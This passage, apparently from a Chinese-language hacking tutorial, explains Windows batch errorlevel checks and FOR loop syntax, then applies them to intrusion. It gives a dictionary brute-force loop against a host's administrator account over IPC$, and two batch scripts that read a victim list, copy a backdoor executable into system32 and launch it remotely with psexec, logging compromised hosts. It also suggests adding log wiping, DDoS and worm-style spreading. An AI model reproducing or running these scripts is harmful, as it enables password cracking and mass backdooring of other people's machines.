3、if errorlevel / if not errorlevel 數字 待執(zhí)行的命令

如果返回碼等于指定的數字，則條件成立，運行命令，否則運行下一句。

如if errorlevel 2 goto x2

DOS程序運行時都會返回一個數字給DOS，稱為錯誤碼errorlevel或稱返回碼，常見的返回碼為0、1。

10.for 命令

for 命令是一個比較復雜的命令，主要用于參數在指定的范圍內循環(huán)執(zhí)行命令。

在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]

%variable 指定一個單一字母可替換的參數。

(set) 指定一個或一組文件?？梢允褂猛ㄅ浞?。

command 指定對每個文件執(zhí)行的命令。

command-parameters 為特定命令指定參數或命令行開關。

在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable

而不要用 %variable。變量名稱是區(qū)分大小寫的，所以 %i 不同于 %I

如果命令擴展名被啟用，下列額外的 FOR 命令格式會受到

支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符，則指定與目錄名匹配，而不與文件

名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

檢查以 [drive:]path 為根的目錄樹，指向每個目錄中的

FOR 語句。如果在 /R 后沒有指定目錄，則使用當前

目錄。如果集僅為一個單點(.)字符，則枚舉該目錄樹。

FOR /L %variable IN (start,step,end) DO command [command-para

該集表示以增量形式從開始到結束的一個數字序列。

因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生

序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command

FOR /F ["options"] %variable IN ("string") DO command

FOR /F ["options"] %variable IN (command) DO command

或者，如果有 usebackq 選項:

FOR /F ["options"] %variable IN (file-set) DO command

FOR /F ["options"] %variable IN ("string") DO command

FOR /F ["options"] %variable IN (command) DO command

filenameset 為一個或多個文件名。繼續(xù)到 filenameset 中的

下一個文件之前，每份文件都已被打開、讀取并經過處理。

處理包括讀取文件，將其分成一行行的文字，然后將每行

解析成零或更多的符號。然后用已找到的符號字符串變量值

調用 For 循環(huán)。以默認方式，/F 通過每個文件的每一行中分開

的第一個空白符號。跳過空白行。您可通過指定可選 "options"

參數替代默認解析操作。這個帶引號的字符串包括一個或多個

指定不同解析選項的關鍵字。這些關鍵字為:

eol=c - 指一個行注釋字符的結尾(就一個)

skip=n - 指在文件開始時忽略的行數。

delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的

默認分隔符集。

tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代

的 for 本身。這會導致額外變量名稱的

格式為一個范圍。通過 nth 符號指定 m

符號字符串中的最后一個字符星號，

那么額外的變量將在最后一個符號解析之

分配并接受行的保留文本。

usebackq - 指定新語法已在下類情況中使用:

在作為命令執(zhí)行一個后引號的字符串并且

引號字符為文字字符串命令并允許在 fi

中使用雙引號擴起文件名稱。

sample1:

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將

每行中的第二個和第三個符號傳遞給 for 程序體;用逗號和/或

空格定界符號。請注意，這個 for 程序體的語句引用 %i 來

取得第二個符號，引用 %j 來取得第三個符號，引用 %k

來取得第三個符號后的所有剩余符號。對于帶有空格的文件

名，您需要用雙引號將文件名括起來。為了用這種方式來使

用雙引號，您還需要使用 usebackq 選項，否則，雙引號會

被理解成是用作定義某個要分析的字符串的。

%i 專門在 for 語句中得到說明，%j 和 %k 是通過

tokens= 選項專門得到說明的。您可以通過 tokens= 一行

指定最多 26 個符號，只要不試圖說明一個高于字母 z 或

Z 的變量。請記住，FOR 變量是單一字母、分大小寫和全局的;

同時不能有 52 個以上都在使用中。

您還可以在相鄰字符串上使用 FOR /F 分析邏輯;方法是，

用單引號將括號之間的 filenameset 括起來。這樣，該字符

串會被當作一個文件中的一個單一輸入行。

最后，您可以用 FOR /F 命令來分析命令的輸出。方法是，將

括號之間的 filenameset 變成一個反括字符串。該字符串會

被當作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進

內存，并被當作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

會枚舉當前環(huán)境中的環(huán)境變量名稱。

另外，FOR 變量參照的替換已被增強。您現在可以使用下列

選項語法:

~I - 刪除任何引號(")，擴充 %I

%~fI - 將 %I 擴充到一個完全合格的路徑名

%~dI - 僅將 %I 擴充到一個驅動器號

%~pI - 僅將 %I 擴充到一個路徑

%~nI - 僅將 %I 擴充到一個文件名

%~xI - 僅將 %I 擴充到一個文件擴展名

%~sI - 擴充的路徑只含有短名

%~aI - 將 %I 擴充到文件的文件屬性

%~tI - 將 %I 擴充到文件的日期/時間

%~zI - 將 %I 擴充到文件的大小

%~$PATH:I - 查找列在路徑環(huán)境變量的目錄，并將 %I 擴充

到找到的第一個完全合格的名稱。如果環(huán)境變量

未被定義，或者沒有找到文件，此組合鍵會擴充

空字符串

可以組合修飾符來得到多重結果:

%~dpI - 僅將 %I 擴充到一個驅動器號和路徑

%~nxI - 僅將 %I 擴充到一個文件名和擴展名

%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名

%~dp$PATH:i - 查找列在路徑環(huán)境變量的目錄，并將 %I 擴充

到找到的第一個驅動器號和路徑。

%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR

在以上例子中，%I 和 PATH 可用其他有效數值代替。%~ 語法

用一個有效的 FOR 變量名終止。選取類似 %I 的大寫變量名

比較易讀，而且避免與不分大小寫的組合鍵混淆。

以上是MS的官方幫助，下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。

sample2：

利用For命令來實現對一臺目標Win2k主機的暴力密碼解除。

我們用net use \ipipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接，當成功時記下密碼。

最主要的命令是一條：for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator"

用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use 命令來連接。然后將程序運行結果傳遞給find命令--

for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:ok.txt ，這樣就ko了。

sample3：

你有沒有過手里有大量肉雞等著你去種后門+木馬呢?，當數量特別多的時候，原本很開心的一件事都會變得很郁悶：)。文章開頭就談到使用批處理文件，可以簡化日常或重復性任務。那么如何實現呢?呵呵，看下去你就會明白了。

主要命令也只有一條：(在批處理文件中使用 FOR 命令時，指定變量使用 %%variable)

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k

tokens的用法請參見上面的sample1，在這里它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。

而cultivate.bat無非就是用net use命令來建立IPC$連接，并copy木馬+后門到victim，然后用返回碼(If errorlever =)來篩選成功種植后門的主機，并echo出來，或者echo到指定的文件。

delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什么樣的了。應該根據%%i %%j %%k表示的對象來排列，一般就是 ip password username。

代碼雛形：

--------------- cut here then save as a batchfile(I call it main.bat ) --------------------

@echo off

@if "%1"=="" goto usage

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k

@goto end

:usage

@echo run this batch in dos modle.or just double-click it.

:end

--------------- cut here then save as a batchfile(I call it main.bat ) --------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------

@net use \%1ipc$ %3 /u:"%2"

@if errorlevel 1 goto failed

@echo Trying to establish the IPC$ connection …………OK

@copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt

@p***ec \%1 c:winntsystem32windrv32.exe

@p***ec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt

:failed

@echo Sorry can not connected to the victim.

----------------- cut here then save as a batchfile(I call it door.bat) -------------------

這只是一個自動種植后門批處理的雛形，兩個批處理和后門程序(Windrv32.exe),PSexec.exe需放在統(tǒng)一目錄下.批處理內容

尚可擴展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.